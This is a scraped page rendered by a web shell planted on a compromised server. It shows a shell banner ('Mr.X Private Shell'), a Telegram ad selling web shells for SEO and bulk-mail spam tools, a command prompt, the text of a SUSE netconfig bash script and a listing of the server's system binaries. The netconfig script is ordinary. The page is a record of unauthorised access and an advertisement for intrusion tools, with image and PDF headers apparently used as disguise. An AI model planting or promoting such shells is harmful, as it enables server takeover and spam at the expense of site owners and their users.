xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
#!/bin/bash
#
# Copyright (c) 2008 SUSE LINUX Products GmbH, Nuernberg, Germany.
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program.  If not, see <http://www.gnu.org/licenses/>.
#
# Author: Michael Calmer <mc@suse.de>
#         Marius Tomaschewski <mt@suse.de>
#

#
# Exit codes
#
# 0  success
# 1  error
# 20 a module was not able to change the configuration
#    because it was changed since the last run
#

unset POSIXLY_CORRECT ; set +o posix # we are using non-posix bash features

# The environment variable ROOT indicates the root of the system to be
# managed by SuSEconfig when that root is not '/'
r=$ROOT

. $r/etc/sysconfig/network/scripts/functions.netconfig

PROGNAME=${0##*/}
STATEDIR=$r/var/run/netconfig/

MODULEDIR=$r/etc/netconfig.d/

. $r/etc/sysconfig/network/config

INPUTFORMAT=dhcpcd

function prepend() {
    test "x$1" != "x" -a -f "$1" || return 0
    netconfig_kv_filter "$1" | grep -Evs '^(SERVICE|INTERFACE)='
}

function modify() {
    if [ "x$SERVICE" = "x" ]; then
        warn "No service informations available"
        return 1
    fi

    if test "x${LEASEFILE}" != x -a ! -r "${LEASEFILE}" ; then
        warn "Unable to read specified input file '${LEASEFILE}'"
        return 1
    fi

    local a b
    IFS=. read a b < /proc/uptime
    local CREATETIME=$a
    local _INTERFACE='' _SERVICE=''
    local -a KEYS VALS
    local _PREPEND=''

    # prepend previous NetworkManager policy settings
    if [ "x$SERVICE"        = "xNetworkManager" -a \
         "x$INTERFACE"      = "x" -a \
         "x$MODFILTER"     != "x" ] ;
    then
        _PREPEND="$STATEDIR/NetworkManager.netconfig"
    fi

    if [ "$INPUTFORMAT" == "dhcpcd" ]; then
        local key val err=0
        # add CREATETIME at index 0 !!
        KEYS=('CREATETIME'  'SERVICE')
        VALS=("$CREATETIME" "$SERVICE")
        while IFS== read -sr key val ; do
            test -n "$key" || {
                test -n "$val" || continue
                err=$val ; break
            }
            case $key in
                (CREATETIME) continue ;;
                (SERVICE|INTERFACE)
                    eval "_$key='$val'"
                    if test "x${!key}" != x -a "x${!key}" != "x$val" ; then
                        warn "Input value $key conflicts with command line argument"
                        return 1
                    fi
                ;;
            esac
            for k in ${KEYS[@]} ; do
                test "x$k" = "x$key" && continue 2
            done
            KEYS[${#KEYS[@]}]=$key
            VALS[${#VALS[@]}]=$val
        done < <(prepend "$_PREPEND" ; netconfig_kv_filter ${LEASEFILE:+"$LEASEFILE"})
        if test $err -ne 0 ; then
            warn "Invalid syntax in ${LEASEFILE:+${LEASEFILE}, }line $err"
            return 1
        fi
    else
        warn "Unsupported lease file / input format '$INPUTFORMAT'"
        return 1
    fi

    # NetworkManager policy merged settings
    if [ "x$SERVICE"        = "xNetworkManager" -a \
         "x$INTERFACE"      = "x" ] ;
    then
        # NetworkManager policy merged config
        CFGFILE="$STATEDIR/NetworkManager.netconfig"

        # first get the createtime. we want to keep it.
        get_variable CREATETIME "$CFGFILE"
        KEYS[0]='CREATETIME'
        VALS[0]="$CREATETIME"

        # remove it also in modify.
        # We want to create it with the same name again.
        rm -f "$CFGFILE"
    else
        # use interface name from config if provided
        if [ "x$INTERFACE" = "x" -a "x$_INTERFACE" != "x" ]; then
            INTERFACE="$_INTERFACE"
        fi

        if [ "x$INTERFACE" = "x" ]; then
            warn "No interface informations available"
            return 1
        fi

        if [ ! -d "$STATEDIR/$INTERFACE" ]; then
            mkdir -p "$STATEDIR/$INTERFACE" || {
                warn "Can not create interface state dir"
                return 1
            }
        fi

        local CFGFILE=`find_cfgfile "$INTERFACE" "$SERVICE"`
        if [ "x$CFGFILE" != "x" ]; then
            # first get the createtime. we want to keep it.
            get_variable CREATETIME "$CFGFILE"
            KEYS[0]='CREATETIME'
            VALS[0]="$CREATETIME"

            # remove it also in modify. 
            # We want to create it with the same name again.
            rm -f "$CFGFILE"
        fi

        if [ "x$CFGFILE" = "x" ]; then
            local CFGNAME=`get_new_cfgname`
            CFGFILE="$STATEDIR/$INTERFACE/$CFGNAME"
        fi
   fi

   debug "write new STATE file $CFGFILE"
   for((i=0; i<${#KEYS[@]} && i<${#VALS[@]}; i++)) ; do
       printf "%s='%s'\n" "${KEYS[$i]}" "${VALS[$i]}"
   done > "$CFGFILE"

   return 0
}

function remove() {
    if [ "x$SERVICE" = "x" ]; then
        warn "No service informations available"
        return 1
    fi

    # NetworkManager policy merged settings
    if [ "x$SERVICE"        = "xNetworkManager" -a \
         "x$INTERFACE"      = "x" ] ;
    then
        # NetworkManager policy merged config
        CFGFILE="$STATEDIR/NetworkManager.netconfig"

    else
        if [ "x$INTERFACE" = "x" ]; then
            warn "No interface informations available"
            return 1
        fi

        CFGFILE=`find_cfgfile "$INTERFACE" "$SERVICE"`
    fi

    if [ "x$CFGFILE" != "x" ]; then
        debug "remove STATE file $CFGFILE"
        rm -f "$CFGFILE"
    fi

    return 0
}

#
# find_cfgfile <interface> <service>
#
function find_cfgfile() {

    test -z "$1" && return 1
    test -z "$2" && return 1

    local INTERFACE=$1
    local CUR_SERVICE=$2

    for CFG in `ls -X $STATEDIR/$INTERFACE/ 2>/dev/null`; do
        get_variable "SERVICE" $STATEDIR/$INTERFACE/$CFG

        if [ "$CUR_SERVICE" = "$SERVICE" ]; then
                CFGNAME=$CFG
                echo "$STATEDIR/$INTERFACE/$CFG"
                return;
        fi
    done
    return 0;
}

function get_new_cfgname() {
    local CFGNAME=""

    for CFG in `ls -X -r $STATEDIR/$INTERFACE/ 2>/dev/null`; do
        CNT=`echo "$CFG" | sed 's/netconfig//'`
        ((CNT++))
        CFGNAME="netconfig$CNT"
        break
    done

    if [ "x$CFGNAME" = "x" ]; then
        CFGNAME="netconfig0"
    fi
    echo $CFGNAME;
}

function run_modules() {
    local mfilter="$1"
    local errors=()
    local msg=""
    local ret=0 err=0

    if [ -n "$FORCE_REPLACE" ]; then
        export FORCE_REPLACE=$FORCE_REPLACE
    fi
    if [ -n "$r" ]; then
        export ROOT=$r
    fi

    debug "Module order: $NETCONFIG_MODULES_ORDER"
    for plg in $NETCONFIG_MODULES_ORDER; do
        case $plg in
            -*)
                debug "${plg:1} module is disabled" ;
                continue
            ;;
        esac
        if [ ! -x "$MODULEDIR/$plg" ]; then
            debug "$plg module is not executable"
            continue
        fi
        case "x$mfilter" in
            "x"|"x${plg}"|"x${plg%%-*}")   ;;
            *) debug "$plg module skipped" ;
               continue                    ;;
        esac

        msg=`"$MODULEDIR/$plg" 2>&1` ; ret=$?
        if [ "$ret" != "0" -a "$err" = "0" ]; then
            err=$ret
        fi
        if [ "x$msg" != x ]; then
            errors[${#errors[@]}]="$msg"
        fi
    done

    if [ ${#errors[@]} -gt 0 ]; then
        for msg in "${errors[@]}" ; do
            echo "$msg"
        done
    fi
    return $err
}

function batch ()
{
    local _BATCHFILE="$BATCHFILE"
    local _SERVICE="$SERVICE"
    local _INTERFACE="$INTERFACE"
    local _LEASEFILE="$LEASEFILE"
    local _INPUTFORMAT="$INPUTFORMAT"
    local _MODFILTER="$MODFILTER"
    local _FORCE_REPLACE="$FORCE_REPLACE"
    local _VERBOSE="$VERBOSE"
    local _QUIET="$QUIET"
    local _IFS="$IFS"
    local ERR RET args

    if test "X$_BATCHFILE" != "X" ; then
        test -f "$_BATCHFILE" || return 1
    fi

    ERR=0
    while read -rs -a args ; do
        set -- "${args[@]}"
        ACTION=""
        BATCHFILE=""
        SERVICE="$_SERVICE"
        INTERFACE="$_INTERFACE"
        LEASEFILE="$_LEASEFILE"
        INPUTFORMAT="$_INPUTFORMAT"
        MODFILTER="$_MODFILTER"
        FORCE_REPLACE="$_FORCE_REPLACE"
        VERBOSE="$_VERBOSE"
        QUIET="$_QUIET"
        while test $# -gt 0 ; do
            VARIABLE=''
            REGEX=''
            case "$1" in
                -s|--service)       VARIABLE=SERVICE ;
                                    REGEX='^[[:alnum:]_-]+$' ;;
                -i|--interface)     VARIABLE=INTERFACE ;
                                    REGEX='^[^'"'"'`"\\/[:space:][:cntrl:]]+$' ;;
                -l|--lease-file)    VARIABLE=LEASEFILE;;
                -I|--input-file)    VARIABLE=LEASEFILE;;
                -F|--input-format)  VARIABLE=INPUTFORMAT;;
                -m|--module-only)   VARIABLE=MODFILTER;;
                -f|--force-replace) FORCE_REPLACE="true";;
                -B|--batch-file)    VARIABLE=BATCHFILE;;
                -v|--verbose)       VERBOSE="yes"; QUIET="no";;
                -q|--quiet)         QUIET="yes"; VERBOSE="no";;
                -h|--help)          ;;
                "") break           ;;
                --)
                    shift
                    test -n "$ACTION" -o $# -gt 1 && {
                        debug "batch: exactly one action can be given."
                        continue 2
                    }
                    ACTION="$1"
                    shift
                    break
                ;;
                *)
                    test -n "$ACTION" && {
                        debug "batch: exactly one action may be given."
                        continue 2
                    }
                    ACTION="$1"
                ;;
                -*) debug "batch: unknown option '$1'" ; continue 2 ;;
            esac
            if [ -n "$VARIABLE" ] ; then
                case $2 in
                (""|-*) debug "batch: option $1 needs an argument" ;;
                esac
                if [ -n "$REGEX" ] ; then
                    if ! [[ ${1} =~ ${REGEX} ]] ; then
                        debug "Invalid character in value for option $VARIABLE"
                        continue 2
                    fi
                fi
                eval $VARIABLE=\$2
                shift
            fi
            shift
        done
        test "X$ACTION" = "Xmodify" -a -z "$LEASEFILE" && {
            debug "batch: input file required"
            continue
        }
        export VERBOSE QUIET ACTION
        RET=0
        case "$ACTION" in
            modify)
                if test -z "$LEASEFILE" ; then
                    debug "batch: input file required in modify action"
                else
                    modify
                fi
            ;;
            remove) remove                                  ;;
            update)
                run_modules "$MODFILTER" ; RET=$?
                if [ "$RET" != "0" -a "$ERR" = "0" ]; then
                    ERR=$RET
                fi
            ;;
            *) debug "batch: unsupported action '$ACTION'"  ;;
        esac
        IFS="$_IFS"
    done < <(cat -- ${_BATCHFILE:+"$_BATCHFILE"})

    return $ERR
}

function usage () 
{
    typeset -a MODULES
    typeset -a MGROUPS
    local grp g plg

    for plg in $NETCONFIG_MODULES_ORDER; do
        case $plg in
          -*) continue ;;
        esac
        if [ ! -x "$MODULEDIR/$plg" ]; then
            continue
        fi
        MODULES=(${MODULES[@]} $plg)
        grp=${plg%%-*}
        for g in ${MGROUPS[@]} ; do
            test "x$grp" = "x$g" && continue 2
        done
        MGROUPS=(${MGROUPS[@]} $grp)
    done
    cat << EOT >&2
Usage:
 $PROGNAME <global options>
 $PROGNAME <action> <action options>

 actions:
  modify    Requires an interface and service specific settings via STDIN
            or as file using the --input-file or --lease-file option.
            Already existing settings for this interface and service will
            be replaced with the new one, otherwise netconfig creates a
            new state file. Finaly, netconfig updates the managed files.
  remove    Removes the interface and service specific settings and
            updates the managed files.
  update    Updates the managed files with the current set of settings.
  batch     Executes a batch file with modify,remove,update action lines.
            Unlike in regular actions, modify and remove do not call update.

 modify options:
  < -s|--service <service name> >       service providing settings
  [ -i|--interface <interface name> ]   interface providing settings
  [ -F|--input-format <input format> ]  currently 'dhcpcd' supported only
  [ -I|--input-file <file name> ]       file name to read, stdin by default
  [ -l|--lease-file <file name> ]       alias for --input-file
  [ -m|--module-only <name | prefix> ]  module or module group updates only
  [ -f|--force-replace ]                generate files, even user modified
  [ -v|--verbose ]                      enable debug and be verbose

 remove options:
  < -s|--service <service name> >       service providing settings
  [ -i|--interface <interface name> ]   interface providing settings
  [ -m|--module-only <name | prefix> ]  module or module group updates only
  [ -f|--force-replace ]                generate files, even user modified
  [ -v|--verbose ]                      enable debug and be verbose

 update options:
  [ -m|--module-only <name | prefix> ]  module or module group updates only
  [ -f|--force-replace ]                generate files, even user modified
  [ -v|--verbose ]                      enable debug and be verbose

 batch options:
  [ -B|--batch-file <file name> ]       file name to read, stdin by default
  [ -v|--verbose ]                      enable debug and be verbose

 global options:
  <-h|--help>                           show this help text

Active modules: ${MODULES[@]}
Module groups : ${MGROUPS[@]}

EOT
  if [ -n "$1" ] ; then
     ERROR="  ERROR:   "
     echo -e "$*\n" | while read line; do
       echo "${ERROR}${line}" >&2
       ERROR="           "
     done
  fi
  exit 1
}

COMMANDLINE="$*"
ACTION=""
SERVICE=""
INTERFACE=""
VARIABLE=""
MODFILTER=""
FORCE_REPLACE=false
QUIET=no
VERBOSE=no
BATCHFILE=""
test "X$NETCONFIG_VERBOSE" = "Xyes"       && VERBOSE="yes"
test "X$NETCONFIG_FORCE_REPLACE" = "Xyes" && FORCE_REPLACE="true"
while true ; do
    # Interface is checked against sysfs before the data is used;
    # reject just the most the ugliest characters...
    REGEX=''
    VARIABLE=''
    case "$1" in
        -s|--service)       VARIABLE=SERVICE ;
                            REGEX='^[[:alnum:]_-]+$' ;;
        -i|--interface)     VARIABLE=INTERFACE ;
                            REGEX='^[^'"'"'`"\\/[:space:][:cntrl:]]+$' ;;
        -l|--lease-file)    VARIABLE=LEASEFILE;;
        -I|--input-file)    VARIABLE=LEASEFILE;;
        -F|--input-format)  VARIABLE=INPUTFORMAT;;
        -m|--module-only)   VARIABLE=MODFILTER;;
        -f|--force-replace) FORCE_REPLACE="true";;
        -B|--batch-file)    VARIABLE=BATCHFILE;;
        -v|--verbose)       VERBOSE="yes"; QUIET="no";;
        -q|--quiet)         QUIET="yes"; VERBOSE="no";;
        -h|--help)          usage;;
        "") break ;;
        --)
            shift
            test -n "$ACTION" -o $# -gt 1 \
            && usage "Exactly one action may be given.\n"\
                "Currently given actions: $ACTION $*"
            ACTION="$1"
            shift
            break
            ;;
        *)
            test -n "$ACTION" && usage "Exactly one action may be given.\n"\
                                       "Currently given actions: $ACTION $1"
            ACTION="$1"
        ;;
        -*) usage Unknown option $1;;
    esac
    if [ -n "$VARIABLE" ] ; then
        case $2 in
        (""|-*) usage "Option $1 needs an argument" ;;
        esac
        if [ -n "$REGEX" ] ; then
            if ! [[ ${1} =~ ${REGEX} ]] ; then
                usage "Invalid character in value for option $VARIABLE"
            fi
        fi
        eval $VARIABLE=\$2
        shift
    fi
    shift
done

test -z "$ACTION" && usage No action was given

test "X$VERBOSE" = "Xyes" && log "Executing '$COMMANDLINE' for pid $PPID"
export VERBOSE QUIET ACTION

#
# before we start, check for root
#
if test "$UID" != "0" -a "$USER" != root -a -z "$ROOT" ; then
    log "You must be root to start $0."
    exit 1
fi

# Check if we can write in /tmp
if ! touch $r/tmp &>/dev/null; then
    log "Filesystem read only: Cannot modify anything"
    exit 1
fi

# Set usefull default umask
umask 0022

# Create state directory
if ! mkdir -p "$STATEDIR" ; then
    log "Unable to create netconfig state directory '$STATEDIR'"
    exit 1
fi

#
# try to get the lock
#
openLockWait "$PROGNAME" 5
if [ "$?" != 0 ]; then
    log "open lock for $PROGNAME failed. Abort."
    exit 1;
fi

RET=0
ERR=0

case "$ACTION" in
    modify)
           modify                   ; RET=$?
           if [ "$RET" != "0" -a "$ERR" = "0" ]; then ERR=$RET; fi
           run_modules "$MODFILTER" ; RET=$?
           if [ "$RET" != "0" -a "$ERR" = "0" ]; then ERR=$RET; fi
           ;;
    update)
           run_modules "$MODFILTER" ; RET=$?
           if [ "$RET" != "0" -a "$ERR" = "0" ]; then ERR=$RET; fi
           ;;
    remove)
           remove                   ; RET=$?
           if [ "$RET" != "0" -a "$ERR" = "0" ]; then ERR=$RET; fi
           run_modules "$MODFILTER" ; RET=$?
           if [ "$RET" != "0" -a "$ERR" = "0" ]; then ERR=$RET; fi
           ;;
    batch)
           batch                    ; RET=$?
           if [ "$RET" != "0" -a "$ERR" = "0" ]; then ERR=$RET; fi
           ;;
    *)
    usage "Invalid action given.\n"
    ;;
esac

unLock "$PROGNAME"

exit $ERR

# vim: set ts=8 sts=4 sw=4 ai et:

Filemanager

Name Type Size Permission Actions
OCICLI File 441 B 0755
OneClickInstallCLI File 441 B 0755
OneClickInstallUI File 99 B 0755
OneClickInstallUrlHandler File 99 B 0755
SUSEfirewall2 File 84.6 KB 0755
SuSEfirewall2 File 84.6 KB 0755
adjtimex File 43.52 KB 0755
agetty File 58.19 KB 0755
analyzevmcore File 22.4 KB 0544
arp File 49.7 KB 0755
arping File 22.04 KB 0755
audispd File 38.18 KB 0750
auditctl File 42.23 KB 0750
auditd File 110.24 KB 0750
augenrules File 3.7 KB 0750
aureport File 98.16 KB 0755
ausearch File 106.17 KB 0755
autrace File 14.09 KB 0750
badblocks File 26.66 KB 0755
blkdeactivate File 14.49 KB 0555
blkid File 102.2 KB 0755
blockdev File 54.17 KB 0755
blogctl File 14.43 KB 0744
blogd File 55.48 KB 0744
blogger File 6.13 KB 0744
brcm_iscsiuio File 171.86 KB 0755
btrfs File 633.27 KB 0755
btrfs-convert File 352.66 KB 0755
btrfs-debug-tree File 316.2 KB 0755
btrfs-image File 340.34 KB 0755
btrfs-show-super File 316.41 KB 0755
btrfs-zero-log File 312.16 KB 0755
btrfsck File 633.27 KB 0755
btrfstune File 316.16 KB 0755
cfdisk File 90.53 KB 0755
chcpu File 38.09 KB 0755
checkproc File 39.65 KB 0755
chkbin File 12.84 KB 0544
chkconfig File 20.13 KB 0755
chkstat-polkit File 2.99 KB 0755
clockdiff File 18.24 KB 0755
crda File 18.52 KB 0755
cryptsetup File 91.71 KB 0755
ctrlaltdel File 34.1 KB 0755
debugfs File 187.7 KB 0755
debugfs.reiserfs File 71.15 KB 0755
debugreiserfs File 71.15 KB 0755
depmod File 236.71 KB 0755
dhclient File 1.78 MB 0755
dhclient-script File 24.49 KB 0754
dhclient6 File 1.78 MB 0755
dmevent_tool File 10.42 KB 0755
dmeventd File 38.17 KB 0555
dmraid File 20.87 KB 0755
dmsetup File 146.7 KB 0555
dmstats File 146.7 KB 0555
dosfsck File 54.58 KB 0755
dosfslabel File 50.57 KB 0755
dumpe2fs File 26.89 KB 0755
e2fsck File 289.48 KB 0755
e2image File 30.98 KB 0755
e2label File 99.89 KB 0755
e2undo File 18.55 KB 0755
ether-wake File 11.53 KB 0755
fbtest File 10.4 KB 0755
fdisk File 134.22 KB 0755
findfs File 10.09 KB 0755
fixfiles File 10.51 KB 0755
fsadm File 25.33 KB 0555
fsck File 46.14 KB 0755
fsck.btrfs File 1.16 KB 0755
fsck.cramfs File 34.13 KB 0755
fsck.ext2 File 289.48 KB 0755
fsck.ext3 File 289.48 KB 0755
fsck.ext4 File 289.48 KB 0755
fsck.fat File 54.58 KB 0755
fsck.minix File 106.2 KB 0755
fsck.msdos File 54.58 KB 0755
fsck.reiserfs File 164.47 KB 0755
fsck.vfat File 54.58 KB 0755
fsck.xfs File 433 B 0755
fsfreeze File 10.09 KB 0755
fstab-decode File 6.25 KB 0755
fstrim File 58.17 KB 0755
getappcore File 28.9 KB 0544
halt File 692.05 KB 0755
hdparm File 100.74 KB 0755
hwclock File 86.3 KB 0755
ifconfig File 62.05 KB 0755
ifdown File 5.82 KB 0755
ifenslave File 18.8 KB 0755
ifprobe File 5.82 KB 0755
ifstatus File 5.82 KB 0755
ifup File 5.82 KB 0755
ifuser File 10.34 KB 0755
in.rdisc File 22.13 KB 0755
init File 1.54 MB 0755
insmod File 236.71 KB 0755
insserv File 6.06 KB 0755
install-info File 39.63 KB 0755
installkernel File 2.59 KB 0755
ip File 498 KB 0755
ipmaddr File 18.45 KB 0755
iptunnel File 22.46 KB 0755
iscsi-gen-initiatorname File 2.1 KB 0755
iscsi-iname File 10.31 KB 0755
iscsi_discovery File 5.17 KB 0755
iscsi_fw_login File 212 B 0755
iscsi_offload File 9.22 KB 0755
iscsiadm File 776.52 KB 0755
iscsid File 796.85 KB 0755
iscsistart File 347.77 KB 0755
iscsiuio File 171.86 KB 0755
isserial File 6.21 KB 0744
kdump File 10.32 KB 0755
kexec File 255.5 KB 0755
key.dns_resolver File 18.45 KB 0755
killall5 File 22.66 KB 0755
killproc File 43.68 KB 0755
kpartx File 42.12 KB 0755
ldconfig File 872.55 KB 0755
load_policy File 10.3 KB 0755
logsave File 10.41 KB 0755
losetup File 98.76 KB 0755
lsmod File 236.71 KB 0755
lspci File 68.23 KB 0755
lvchange File 2.07 MB 0555
lvconvert File 2.07 MB 0555
lvcreate File 2.07 MB 0555
lvdisplay File 2.07 MB 0555
lvextend File 2.07 MB 0555
lvm File 2.07 MB 0555
lvmconf File 12.55 KB 0555
lvmconfig File 2.07 MB 0555
lvmdiskscan File 2.07 MB 0555
lvmdump File 10.07 KB 0555
lvmetad File 70.23 KB 0555
lvmpolld File 62.55 KB 0555
lvmsadc File 2.07 MB 0555
lvmsar File 2.07 MB 0555
lvreduce File 2.07 MB 0555
lvremove File 2.07 MB 0555
lvrename File 2.07 MB 0555
lvresize File 2.07 MB 0555
lvs File 2.07 MB 0555
lvscan File 2.07 MB 0555
mdadm File 554.64 KB 0755
mdmon File 305.23 KB 0755
mingetty File 22.8 KB 0755
mkdosfs File 27.06 KB 0755
mke2fs File 120.23 KB 0755
mkfs File 10.09 KB 0755
mkfs.bfs File 26.1 KB 0755
mkfs.btrfs File 332.27 KB 0755
mkfs.cramfs File 34.11 KB 0755
mkfs.ext2 File 120.23 KB 0755
mkfs.ext3 File 120.23 KB 0755
mkfs.ext4 File 120.23 KB 0755
mkfs.fat File 27.06 KB 0755
mkfs.minix File 94.19 KB 0755
mkfs.msdos File 27.06 KB 0755
mkfs.reiserfs File 23.04 KB 0755
mkfs.vfat File 27.06 KB 0755
mkfs.xfs File 423.13 KB 0755
mkhomedir_helper File 18.45 KB 0755
mkill File 39.71 KB 0755
mkinitrd File 12.84 KB 0755
mkinitrd_setup File 18 B 0755
mkreiserfs File 23.04 KB 0755
mkswap File 94.18 KB 0755
modinfo File 236.71 KB 0755
modprobe File 236.71 KB 0755
mount.cifs File 38.87 KB 0755
mount.crypt File 556 B 0755
mount.crypt_LUKS File 556 B 0755
mount.crypto_LUKS File 556 B 0755
mount.fuse File 10.32 KB 0755
mount.nfs File 112.29 KB 4755
mount.nfs4 File 112.29 KB 4755
mount.vmhgfs File 42.82 KB 0755
mpathpersist File 27 KB 0755
multipath File 30.09 KB 0755
multipathd File 114.15 KB 0755
nameif File 14.63 KB 0755
netconfig File 17.87 KB 0755
nfsdcltrack File 23 KB 0755
nologin File 10.09 KB 0755
osd_login File 2.55 KB 0755
pam_tally2 File 14.48 KB 0755
pam_timestamp_check File 10.42 KB 0755
pbl File 7.33 KB 0755
pidof File 22.66 KB 0755
pidofproc File 39.65 KB 0755
pivot_root File 10.1 KB 0755
plipconfig File 10.33 KB 0755
pmap_set2 File 6.09 KB 0755
poweroff File 692.05 KB 0755
purge-kernels File 10.28 KB 0755
pvchange File 2.07 MB 0555
pvck File 2.07 MB 0555
pvcreate File 2.07 MB 0555
pvdisplay File 2.07 MB 0555
pvmove File 2.07 MB 0555
pvremove File 2.07 MB 0555
pvresize File 2.07 MB 0555
pvs File 2.07 MB 0555
pvscan File 2.07 MB 0555
rarp File 24.77 KB 0755
raw File 14.09 KB 0755
rcSuSEfirewall2 File 5.28 KB 0755
rcipmi File 5.28 KB 0755
rcnetwork File 5.28 KB 0755
rcsyslog File 411 B 0755
reboot File 692.05 KB 0755
refresh_initrd File 1.08 KB 0755
regdbdump File 14.34 KB 0755
reiserfsck File 164.47 KB 0755
reiserfstune File 23.25 KB 0755
request-key File 18.48 KB 0755
resize2fs File 55.39 KB 0755
resize_reiserfs File 18.61 KB 0755
restorecon File 26.73 KB 0755
rmmod File 236.71 KB 0755
rmt File 34.83 KB 0755
route File 52.34 KB 0755
rpcbind File 50.34 KB 0755
rpcinfo File 26.26 KB 0755
rsyslogd File 602.45 KB 0755
runlevel File 692.05 KB 0755
rvmtab File 35.62 KB 0755
service File 5.28 KB 0755
set_polkit_default_privs File 2.62 KB 0755
setconsole File 14.53 KB 0744
setfiles File 26.73 KB 0755
setpci File 22.5 KB 0755
sfdisk File 122.17 KB 0755
showconsole File 14.53 KB 0744
shutdown File 692.05 KB 0755
slattach File 32.86 KB 0755
smart_agetty File 2.03 KB 0755
start_daemon File 55.96 KB 0755
startpar File 34.96 KB 0755
startproc File 55.96 KB 0755
supportconfig File 188.32 KB 0544
swaplabel File 14.09 KB 0755
swapoff File 18.09 KB 0755
swapon File 46.34 KB 0755
switch_root File 14.1 KB 0755
sysctl File 22.56 KB 0755
telinit File 692.05 KB 0755
tracepath File 14.04 KB 0755
tracepath6 File 14.04 KB 0755
tune2fs File 99.89 KB 0755
tunefs.reiserfs File 23.25 KB 0755
udevadm File 474.44 KB 0755
udevd File 482.48 KB 0755
umount.crypt File 556 B 0755
umount.crypt_LUKS File 556 B 0755
umount.crypto_LUKS File 556 B 0755
umount.nfs File 112.29 KB 4755
umount.nfs4 File 112.29 KB 4755
unix_chkpwd File 34.78 KB 4755
unix_update File 34.73 KB 0700
update-bootloader File 7.33 KB 0755
update-pciids File 1.87 KB 0755
vconfig File 14.31 KB 0755
vgcfgbackup File 2.07 MB 0555
vgcfgrestore File 2.07 MB 0555
vgchange File 2.07 MB 0555
vgck File 2.07 MB 0555
vgconvert File 2.07 MB 0555
vgcreate File 2.07 MB 0555
vgdisplay File 2.07 MB 0555
vgexport File 2.07 MB 0555
vgextend File 2.07 MB 0555
vgimport File 2.07 MB 0555
vgimportclone File 2.07 MB 0555
vgmerge File 2.07 MB 0555
vgmknodes File 2.07 MB 0555
vgreduce File 2.07 MB 0555
vgremove File 2.07 MB 0555
vgrename File 2.07 MB 0555
vgs File 2.07 MB 0555
vgscan File 2.07 MB 0555
vgsplit File 2.07 MB 0555
vhangup File 10.38 KB 0755
wipefs File 38.1 KB 0755
wiper.sh File 27.43 KB 0755
xfs_repair File 624.25 KB 0755
yast File 12.4 KB 0755
yast2 File 12.4 KB 0755
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
admin f – Seiko Business Matching